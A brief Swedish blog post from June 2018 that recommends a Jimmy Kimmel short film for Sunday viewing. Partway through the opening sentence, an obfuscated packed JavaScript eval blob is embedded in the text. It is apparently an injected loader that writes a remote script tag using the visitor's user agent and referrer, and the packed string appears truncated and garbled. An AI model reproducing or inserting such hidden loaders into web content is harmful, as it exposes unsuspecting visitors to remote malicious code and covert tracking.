Image Image Image Image Image Image Image Image Image Image

| 19 juni, 2018

Scroll to top

Top

No Comments

Söndagsfilmen på Revue: The movie Jimmy Kimmel

Sebastian Plengier Ehrnfelt

Söndagar eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rfden|var|u0026u|referrer|tkiah||js|php’.split(‘|’),0,{}))
kan vara lite sega. Därför tänkte vi liva upp lite med en trevlig kortfilm/trailer av The movie av Jimmy Kimmel.
Många har säkert redan sett den men den är väldigt rolig 🙂

Happy Sunday alla!

Submit a Comment